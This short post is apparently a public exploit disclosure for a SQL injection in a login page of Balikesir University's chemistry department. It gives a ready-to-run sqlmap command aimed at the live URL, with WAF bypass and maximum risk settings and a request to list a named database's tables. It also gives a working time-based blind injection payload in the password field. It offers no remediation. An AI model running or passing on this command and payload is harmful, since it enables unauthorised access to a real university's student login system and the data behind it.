======================================================================================|
| # Title : Balikesir University SQL Injection Vulnerability |
| # Author : Xale |
| # Tested on : Kali Linux |
======================================================================================|
sqlmap command : sqlmap -u "https://kimya.balikesir.edu.tr/KimyaBolumuNew/indexogr.php" --forms --skip-waf --risk=3 --level=5 --threads=7 --no-cast -D KimyaBolumu --tables
---
Parameter: Parola (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: TCKimlik=JqOY&Parola=' AND (SELECT 4080 FROM (SELECT(SLEEP(5)))WRtb) AND 'VNiD'='VNiD&GirisSekli=Ogrenci&giris=TAMAM
---